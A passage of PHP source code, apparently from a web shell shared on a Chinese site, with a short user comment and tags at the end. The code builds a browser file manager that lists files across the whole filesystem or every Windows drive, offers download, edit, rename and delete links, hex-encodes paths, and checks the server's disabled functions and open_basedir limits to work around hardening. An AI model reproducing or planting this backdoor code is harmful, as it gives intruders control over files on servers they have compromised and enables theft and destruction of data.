'{return_size}', '{return_chmod}', '{return_perms}', '{is_folder}', ), array( KING_SELF, bin2hex($basefile), //1 $value, date('Y-m-d H:i:s', $this->filemtime($basefile)), '无', substr(sprintf('%o', $this->fileperms($basefile)), -4), $this->perms($basefile), sprintf('<a class="action_del" href="%s?action=rename&file=%s">重命名</a> | ',KING_SELF,bin2hex($basefile)). sprintf('<a class="action_del" href="%s?action=rmdir&file=%s">删除</a>',KING_SELF,bin2hex($basefile)), ), show_html()); } unset($key, $value, $basefile); } if (isset($filename['files'])) { sort($filename['files']); foreach ($filename['files'] as $key => $value) { $basefile = $this->mbstring($pathname) . '/' . $value; $color = ($key + 1) % 2 ? 'dd' : 'fff'; $files[$key] = str_replace(array( '{self}', '{file}', '{return_file}', '{return_time}', '{return_size}', '{return_chmod}', '{return_perms}', '{is_folder}', '{.red}'), array( KING_SELF, bin2hex($basefile), $value, //1 date('Y-m-d H:i:s', $this->filemtime($basefile)), $this->byte_format($this->filesize($basefile)), substr(sprintf('%o', $this->fileperms($basefile)), -4), $this->perms($basefile), sprintf('<a href="%s?action=down&file=%s">下载</a> | ', KING_SELF, bin2hex($basefile)) . sprintf('<a class="action_del" href="%s?action=editfile&file=%s">编辑</a>',KING_SELF,bin2hex($basefile)). ' | <a href="">重命名</a> | ' . sprintf(' <a class="action_del" href="%s?action=del&file=%s">删除</a>', KING_SELF, bin2hex($basefile)), ($value == KING_SELF) ? 'red' : null, ), show_html()); } } if (!isset($dirs)) $dirs = array(); if (!isset($files)) $files = array(); $arr = array_merge($dirs, $files); foreach ($arr as $k => $v) { $color = ($k + 1) % 2 ? 'fff' : 'dd'; $res[] = str_replace(array('{color}'), array($color), $v); } return join(null, $res); } function webroot() { return bin2hex(str_replace('\\', '/', $_SERVER["DOCUMENT_ROOT"])); } function scriptroot() { return bin2hex(str_replace('\\', '/', dirname($_SERVER["SCRIPT_FILENAME"]))); } protected function filemtime($path) { if (IS_WIN) $path = $this->gbk_mbstring($path); else $path = $this->mbstring($path); return filemtime($path); } protected function fileperms($path) { if (IS_WIN) $path = $this->gbk_mbstring($path); else $path = $this->mbstring($path); return fileperms($path); } protected function filesize($path) { if (IS_WIN) $path = $this->gbk_mbstring($path); else $path = $this->mbstring($path); return filesize($path); } protected function perms($path) { if (IS_WIN) $path = $this->gbk_mbstring($path); else $path = $this->mbstring($path); $perms = fileperms($path); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = '?????????'; return $info; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-')); return $info; } protected function setpath($path) { $_SESSION['dirpath'] = $path; return $path; } protected function current_dir() { $path = !empty($_SESSION['dirpath']) ? $_SESSION['dirpath'] : $this->basedir(); return $this->dirpath($path); } protected function basedir() { $path = !empty($_SESSION['dirpath']) ? $_SESSION['dirpath'] : str_replace('\\', '/', dirname(__file__)); $this->setpath($path); return $path; } protected function all_dir() { if (!IS_WIN) { return $this->scanlinux(); } else { return $this->scanwindows(); } } protected function scanlinux() { if (ini_get('open_basedir')) return; $pathname = '/'; return $this->scandir($pathname, true); } protected function scanwindows() { $range = range('A', 'Z'); foreach ($range as $dir) { if (is_dir(sprintf('%s:', $dir))) { $dirs[] = sprintf('<a class="action_del" href="%s?action=view&file=%s">%s</a>', KING_SELF, bin2hex($dir . ':'), $dir); } } return join(' | ', $dirs); } protected function scandir($path, $dir = false) { if ($dir == true && !strpos(ini_get('disable_functions'), 'scandir')) { $class = scandir($path); foreach ($class as $key => $fileinfo) { if ($fileinfo == '.' || $fileinfo == '..') continue; if (is_dir($path . '/' . $fileinfo)) { $files[] = sprintf('<a class="action_del" href="%s?action=view&file=%s">%s</a>', KING_SELF, bin2hex('/' . str_replace('\\', '/', $fileinfo)), str_replace('\\', '/', $fileinfo)); } } return join(' | ', $files); } //先采用scandir扫描 if (!strpos(ini_get('disable_functions'), 'scandir')) { $root = scandir($path); foreach ($root as $key => $value) { if ($value == '.' || $value == '..') continue; if (is_dir($path . '/' . $value)) { $dirs[] = $this->mbstring(str_replace('\\', '/', $value)); } if (is_file($path . '/' . $value)) { $files[] = $this->mbstring(str_replace('\\', '/', $value)); } } return array('dirs' => $dirs, 'files' => $files); } $class = new DirectoryIterator($path); if ($dir == true) { foreach ($class as $key => $fileinfo) { if ($fileinfo->getFilename() == '.' || $fileinfo->getFilename() == '..') continue; if ($fileinfo->isDir()) { $files[] = sprintf('<a class="action_del" href="%s?action=view&file=%s">%s</a>', KING_SELF, bin2hex('/' . str_replace('\\', '/', $fileinfo->getFilename())), str_replace('\\', '/', $fileinfo->getFilename())); } } return join(' | ', $files); } foreach ($class as $key => $fileinfo) { if ($fileinfo->getFilename() == '.' || $fileinfo->getFilename() == '..') continue; if ($fileinfo->isFile()) { $files[] = $this->mbstring(str_replace('\\', '/', $fileinfo->getFilename())); } if ($fileinfo->isDir()) { $dirs[] = $this->mbstring(str_replace('\\', '/', $fileinfo->getFilename())); } } return array('dirs' => $dirs, 'files' => $files); } protected function space_total() { $path = !empty($_SESSION['dirpath']) ? $_SESSION['dirpath'] : dirname(__file__); $dis = explode(',', ini_get('disable_functions')); if (in_array('disk_total_space', $dis)) { return '0B'; } return $this->byte_format(disk_total_space($path)); } //拆解当前路径
本地测试后发现功能,点评下,功能太尼玛简单咯
标签:pack, call_user_func